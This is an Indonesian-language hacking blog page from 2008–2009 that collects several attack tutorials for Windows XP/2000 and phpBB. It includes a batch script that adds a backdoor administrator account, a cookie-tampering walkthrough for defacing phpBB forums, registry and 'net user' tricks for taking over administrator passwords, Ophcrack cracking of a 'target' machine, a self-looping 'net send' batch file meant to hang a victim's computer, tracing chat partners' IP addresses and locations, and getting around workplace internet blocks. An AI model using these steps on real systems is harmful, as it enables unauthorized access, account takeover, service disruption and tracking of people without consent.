Sabtu, 28 November 2009

Hack XP

0 komentar

Echo Backdoor

rem *echobackd00r.bat
rem *Maret 2004 – backd00r untuk XP && 2000
rem *dibuat untuk mempermudah menciptakan account admin
rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2
rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal

rem *MULAI.

@echo off
PROMPT $P$G
cls
Color 87
GOto iklan

:setting

rem *ganti USER dan PASS

set USER=”backdoor”
set PASS=”password”

if %USER%==”backdoor” Goto gagal else GOto proses

:proses

rem *masuk ke perintah tuk nambahin user + passwordnya

net user %USER% %PASS% /add
net localgroup Administrators %USER% /add
net localgroup Users %USER% /delete

cls
echo.
echo Account %USER% dengan password %PASS% telah berhasil di buat! Continue reading ‘Echo Backdoor’

25
Mar
08

Defacing

Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20
1. Download browser Mozilla FireFox

2. Download pluginnya yg bernama LiveHTTPHeader
download di http://livehttpheaders.mozdev.org/installation.html
cari yg paling baru

3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]

4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader

5. Ingat, isi LiveHTTPHeader harus kosong

6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target

7. setelah halaman sukses terbuka ditandai dengan tanda “done” di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..

8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay…

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

9. Hapus bagian yg belakang setelah tanda semi colon (

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

\_______________hapus bagian ini_________________/

jadinya akan seperti ini :

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D Continue reading ‘Defacing’

12
Feb
08

Cara Mendapatkan Hak/password Administrator

1. Mau tau username dan password saja :

a. Klik START dan pilih RUN dan ketik CMD terus ENTER
(masuk ke command promt) dan ketik
“net user” (tanpa tanda petik)
tampil deh username yang ada.

2. Hack account adminstrator windows
(catatan : tidak semua sistem windows ada)

a. Sign in sebagau guest/limited account
b. Klik START, RUN dan ketik REGEDIT dan ENTER
c. Buka directory ini :
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon]
d. Cari “”AutoAdminLogon.”, klik kanan dan pilih
MODIFY dan ubah VALUE DATA ke “1″
e. Exit dan restart, langsung deh / otomatis login ke
administrator.

3. Ubah Password Account tanpa PASSWORD LAMA
a. Klik START dan pilih RUN dan ketik CMD terus ENTER
(masuk ke command promt) dan ketik
net users Administrator * (ketik dengan tanda
bintangnya) atau kalau udah tau username nya ketik :
net users “Baba” * (Baba adalah contoh nama username)
b. Terus ada pertanyaan buat password baru, ketik deh
password barunya dan konfirmasikan kembali. Setelah
itu anda gunakan password baru itu buat login. Continue reading ‘Cara Mendapatkan Hak/password Administrator’

31
Jan
08

Hack Windows XP Password dengan Ophcrack

Sebelumnya saya pernah membuat tutorial mengenai Hack Windows XP (SP2) Passwords menggunakan pwdump6. Namun, cara tersebut mengharuskan user dengan status admin agar dapat ‘dump’ file HASH dari Windows. Sekarang saya akan menyampaikan cara lain untuk ‘cracking’ password Windows XP (semua versi) dengan menggunakan Ophcrack.

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Hebatnya lagi, Ophcrack tersedia dalam bentuk LiveCD, sehingga tidak diperlukan proses instalasi dan tidak perlu password admin, hanya butuh akses agar komputer dapat booting dari CD (biasanya urutan booting default BIOS komputer saat ini dimulai dari CD/DVD ROM, so don’t worry) -D . Ophcrack LiveCD merupakan Linux yang berbasis SLAX (turunan dari Slackware) dan sudah terdapat Ophcrack dan Rainbow Table untuk cracking password alpanumerik.

Intinya hampir sama dengan cara kerja pwdump6, namun karena Ophcrack menggunakan linux LiveCD sehingga dapat langsung mount file sistem Windows tanpa perlu login ke Windows serta membaca file Hash (windows\system32\config) dan melakukan dump ke file text biasa yang kemudian dapat langsung di crack. Dan hebatnya, tidak perlu Tools seperti JTR lagi, karena crack dilakukan dengan Ophcrack menggunakan Rainbow Table dan memberikan hasil yang sangat cepat.

Ok.. langsung aja kita praktek, tapi sebelumnya pasang disclaimer dulu ah… biar bisa ‘lepas’ tanggung jawab kalau tutorial ini disalahgunakan oleh pihak lain -P

Disclaimer:

This document was written in the interest of education and care of awareness for unaware people. The author cannot be held responsible for how the topics discussed in this document are applied.

Lets Begin

Pertama kali anda harus mendownload file ISO Ophcrack LiveCD dari sini. Lalu burn ke dalam CD. Dan selanjutnya boot Komputer ‘target’ dari Ophcrack LiveCD, maka akan tampak seperti ini :

boot.JPG

Tekan Enter dan biarkan proses Booting berlangsung. Ophcrack akan otomatis masuk ke windows manager menggunakan fluxbox dan langsung menjalankan Ophcrack. Proses pertama adalah mendapatkan file HASH dari partisi yang berisi file Windows kemudian di dump ke file /tmp/ophcrack.tmp Continue reading ‘Hack Windows XP Password dengan Ophcrack’

24
Jan
08

Tutorial Melakukan Flooding Jaringan

Mungkin ada yang ingin bertanya, “bagaimana seh caranya flooding ke komputer lain dalam satu network?” dan mungkin akan ada juga pertanyaan “kenapa anda ingin melalukan flooding ke komputer lain dalam 1 network?”.

Nah, alasannya ada beragam. Bisa karena kesal dengan calon korban, bisa karena sekedar iseng, bisa karena ingin nambah ilmu aja, ato alasan apa aja. Tapi untuk jawaban yang pertama, akan saya beri sedikit turorial berupa scriptnya.OK..!!! ikuti langkah2 berikut ini :
  1. Run command prompt/cmd anda, caranya klik start > run > cmd
  2. Saat command prompt anda muncul, ketik edit hi.bat
  3. Maka tampilan command prompt anda akan berbeda. setelah itu masukkan/ketikkan code di bawah ini :

net send [ipkomputer]/[namakomputer] hi
call hi.batkemudian save as file tersebut.

Saat ingin melakukan flooding, tingal klik 2 kali file batch tersebut…

Ket :

  • hi.bat bisa pada langkah 2 bisa diganti dangan nama apa saja, asal tidak spasi dan harus berekstensi .bat dan jangan lupa juga mengganti hi.bat pada code dengan nama yang sama pada langkah 2.
  • jika ga tau nama komputer yang terhubung di jaringan, run cmd, lalu ketik “net view” (tanpa tanda petik2) dan juga saat dimasukkan tanpa tanda [ dan ]. Ingat juga, pilih antara ip ato nama komputer.
  • cara ini hanya bisa dilakukan jika service messenger pada windows anda dan komputer tujuan di aktifkan
  • yang terakhir..!!!! flooding ini akan mengirim pesan “hi” (bisa diganti) berulang-ulang hingga komputer tujuan hang. jadi gunakan dengan bijak.

Sekian…

23
Jan
08

Cara masuk di komputer lain lewat DOS (Windows XP / 2000)

Kali ini saya akan memberikan sedikit informasi mengenai bagaimana cara seseorang yang ingin mencoba menerobos masuk ke komputer orang lain melalui DOS(Windows XP/2000).Hal yang pertama kita lakukan adalah kita harus tahu dulu alamat IP address/Host Name/Computer name target/korban;

berikut langkah-langkah nya:

1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING WWW.SITUS-YANG-DILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.

2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.

3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.

Setelah semua nya selesai anda hanya tinggal menambahkan sedikit ramuan mujara/tools tambahan :) Continue reading ‘Cara masuk di komputer lain lewat DOS (Windows XP / 2000)’




Selasa, 24 November 2009

Ultrasurf

0 komentar
UltraSurf merupakan sebuah aplikasi yang menyediakan multiple web proxy yang sangat cocok untuk digunakan ketika melukan proses browsing di-internet, khusunya bagi para pengguna sistem operasi windows. Dengan menggunakan aplikasi ini alamat IP yang digunakan pada saat browsing, akan digantikan oleh alamat IP yang memang sudah disetting secara automatis oleh aplikasi tersebut.

Prinsip kerja dari UltraSurf hampir menyerupai prinsip kerja dari tunnel (ssh atau http tunnel) pada umumnya. Saat aplikasi tersebut dirunning UltraSurf akan membuat sebuah koneksi dinamis menuju IP ADDRESS tertentu secara acak, dimana IP tersebut memang yang sudah disediakan oleh UltraSurf secara otomatis. Dari koneksi dinamis tersebut UltraSurf akan membuat sebuah binding port pada localhost, Port standar yang digunakan adalah pada port 9666. Melalui koneksi dan binding Port tersebutlah nantinya semua paket data akan dilewatkan.

Secara default, saat dijalankan UltraSurf akan membuka internet explorer yang memang sudah dikonfigurasi untuk dapat langsung berintegrasi dengan UltraSurf, tanpa harus melakukan konfigurasi kembali. Namun tidak semua orang suka menggunakan Internet Explorer dan lebih suka menggunakan Web Browser lainnya seperti Mozilla Firefox misalnya. Untuk mengintegrasikan UltraSurf dengan Mozilla Firefox, maka harus dilakukan konfgurasi manual, agar semua paket data pada aktifitas browsing yang dilakukan, dilewatkan melalui koneksi yang telah dibuat oleh UltraSurf.

Cara yang dilakukan untuk mengintegrasikan UltraSurf dengan Mozilla Firefox pun sama dengan konfigurasi proxy lain pada umumnya, yaitu dengan mengklik menu Tools pada menubar, kemudian lanjutkan ke menu Options. Setelah muncul dialog Options, Klik Tab Advance dan pilih Sub tab Network. Klik Tombol Settings pada sub tab tersebut, maka akan ditampilkan dialog Connection Settings. Setelah dialog tersebut muncul, maka checklist option Manual Proxy Configuration, dan isikan localhost atau 127.0.0.1 pada input text HTTP Proxy dan 9666 pada input Port, agar lebih meyakinkan semua transaksi data menggunakan port dan IP Address Local, Checklist Option Use this proxy server for all protocol. Klik OK pada dialog Connection Settins, Dan OK kembali pada dialog Options. Maka Firefox pun sudah terintegrasi dengan UltraSurf , dan sudah dapat digunakan untuk browsing dengan aman di internet.

Untuk dapat menggunakan UltraSurf, dapat didownload dengan gratis pada web site resminya di ultrareach.com. Terima Kasih, Semoga bermanfaat.




Jumat, 20 November 2009

Unblock Internet

0 komentar

gw mau bagi2 pengalaman gmn caranya bisa tetap browsing kalo internet kita di block ma admin kantor. Soalnya hal ini jg terjadi ma gw,sapa yang gak Bt internet di blok gak bisa browsing pa lagi chatting,
Ok pertama2 kita karus tau dulu rule yang dibuat siadmin dalam memblok internet tersebut. yang g tau sech biasa nya ada 2 cara :
1. Siadmin membuat rule dengan menggunakan IP, jadi gini rule nya misal siadmin mempunyai IP 2.1 - 2.200, jadi blok IP sekian sampai sekian selebihnya tidak, dan biasa nya yang tidak ini termasuk IP DHCP dan IP BOSS2 yang di perbolehkan internet,jadi klo lo semua mau internetan tinggal DHCP aja IP nya (IP gak usah lo, isi tp pake obtain aja), klo gak lo tunggu dech boss lo semua pada pulang trus lo pake IP nya. Klo cara diatas gak bisa jg ni g kasih software. Gw punya 2 macam : A. Ultrasurf, Gw lebih suka pake ini. lo tinggal klik aja dan serahkan semua ma dia g jamin pasti bisa,,ohh iya perlu diingat software ini lansung direct ke IE lo semua,jadi klo lo mau pake mozila lo tinggal liat aja proxy and port yang tertulis di IE lo trus setting juga di mozila lo. Beres dech...

Kamis, 12 November 2009

Tutorial Office 2007

0 komentar
Siapa yang gak kenal salah satu program bawaan microsoft Office ini. saya sendiri hampir tiap hari pake ini program,padahal sech tampilannya cuma kotak-kotak yang gak penting bgt ya....g yakin lo semua past tau,yup bnr sekali excel nama nya,yang g pake sech versi 2007. Mungkin bagi sebagain orang tampilannya sedikit membingungkan, tp ko menurut g,ehm..... lumayan lah. Jujur dlu g gak bisa excel sama sekali ok ini g kasih tutor gmn caranya lo2 semua bisa pada jago excel mulai dari dasar hingga database.klo berminat lo bisa ambil disini.


Jebol Password Admin

0 komentar
ada beberapa cara yang bisa dipake buat ngejebol pass admin Mulai dari masuk safe mode (syarat Administratornya gak di pass jg nah klo da kasus administratornya di pass gmn? Tenang asal kita masih bisa akses fisik. (dari user guest jg bs koq), untuk lebih jelasnya download disini atau coba cara di bawah

Coba masuk / booting lewat DOS, kemudian masuk ke folder
C:\Windows\System32

Kemudian ketik perintah berikut :

NET USER namakamu passwordkamu /ADD
NET LOCALGROUP ADMINISTRATORS namakamu /ADD
NET LOCALGROUP USERS namakamu /DELETE


Nah abis itu restart tuh komp nya dan login dengan namakamu dan passwordkamu, kamu otomatis akan berstatus ADMINISTRATOr

Selamat Mencoba...